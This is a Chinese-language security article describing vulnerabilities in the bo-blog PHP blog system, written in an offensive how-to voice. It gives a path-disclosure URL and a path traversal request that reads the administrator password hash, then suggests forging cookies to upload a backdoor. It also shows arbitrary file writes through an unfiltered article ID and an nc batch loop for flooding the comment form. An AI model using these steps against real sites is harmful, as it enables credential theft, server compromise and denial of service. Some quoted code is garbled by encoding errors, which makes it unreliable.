bo-blog是一款外觀好看，而且當(dāng)前流行的個人博客系統(tǒng)，在很多下載站你都可以找到這套程序，而且甚至有很多安全界的人都使用著這套php+txt的程序，但是這套程序里有些安全隱患，可能會被人利用去做一些破壞。

　　首先開門見山，我們說說它的絕對路徑暴露問題.........

　　只要提交地址：_blank>http://localhost/blog/index.php?m=2&y=/2005

　　就可以得到程序所在絕對路徑!

　　這是php中很經(jīng)常出現(xiàn)的問題!

　　現(xiàn)在我們在來看一段代碼，這是showcat.php里的內(nèi)容!

　　if (!file_exists("$dirblog/$cat.php")) {

　　wronginfo($langerrornocat);

　　}

　　unset ($allfiles);

　　$allfiles=@file("$dirblog/$cat.php");

　　看到了沒有?他直接把cat.php沒有處理就拿出來用了，而它又是怎么處理他拿出來的數(shù)據(jù)的呢?

　　for ($i=$start; $i<$end;$i++) {

　　$latest=explode("|",$allfiles[$i]);

　　$articleid=$latest[1];

　　$articlename=$latest[2];

　　$latest[3]=mktimezone($latest[3]);

　　$showtime=date("Y-n-j",$latest[3]);

　　這樣，它將$cat提交來的文件打開，讀出來，但是以|為分隔讀出文件內(nèi)容，因為以|讀出文件內(nèi)容卻是從1開始的，所以我們讀不出其他的文件，我們只能讀文件里有|的文件的第一個|后面的數(shù)據(jù)。也就是說，假設(shè)我們知道用戶所在目錄的話，我們就可以提交_blank>http://localhost/blog/index.php?job=showcat&cat=../saiy/userid

　　便可以得到管理員的密碼散列。

　　然后偽造cookies登陸，直接可以傳后門了。但是前提是要知道目錄名，所以這只限制于目錄名了，但是假設(shè)對方站點上有其他的php+文本的程序，我們可以利用此文件讀出隱秘內(nèi)容。

　　我們再來說第二個問題，回復(fù)評論未限制時間，大家大概覺得這不算什么問題吧，看完代碼不知道你還會這么想嗎?

　　$replyauthor=safe_convert($replyauthor);

　　$remreplyauthor=$replyauthor;

　　if ($replyemail!="") $replyauthor.="胃胃".safe_convert($replyemail);

　　$replycontent=safe_convert($replycontent);

　　$simplecontent=preg_replace("/[(.+?)]/is", "", $replycontent);

　　$simplecontent=preg_replace("/<(.+?)>/is", "", $simplecontent);

　　$simplecontent=preg_replace("/&(.+?);/is", "", $simplecontent);

　　$curexcerpt=msubstr($simplecontent,0,20);

　　$timestamp=time();

　　$areply=@readfromfile("$dirblog/$articleid.rpl");

　　writetofile("$dirblog/$articleid.rpl",$replycontent."n|rep|n".$areply);

　　writetofile("$dirblog/list.php",$all1);

　　updaterenum(1);

　　看到?jīng)]有?居然也沒對$articleid做過濾，大家覺得嚇人嗎?哦?你們覺得不怎么樣?恐怕不好玩?我改改你再看看。

　　writetofile("$dirblog/C:winntsystem32hacker.rpl",$replycontent."n|rep|n".$areply);

　　呼，這樣我們把一個垃圾文件寫到系統(tǒng)目錄下了。要么，寫到管理員啟動目錄?一個N大無比的文本文件。

　　只要我們不停的提交數(shù)據(jù)，則不斷的把文件寫入了，假設(shè)你手頭沒有工具可以幫你提交，我教你個簡單的，利用NC的方法!

　　首先，抓取你發(fā)表評論的包，存在NC所在目錄下，命名為test.txt。這個大家都會做吧~~

　　再建立一個bat，命名為test.bat內(nèi)容為：

　　nc www.test.com 80 cls

　　test.bat

　　呵呵，運行這個.bat文件它就會不停的發(fā)送評論了，開兩個就是兩個線程哦 ！

（本文由責(zé)任編輯 pasu 整理發(fā)布）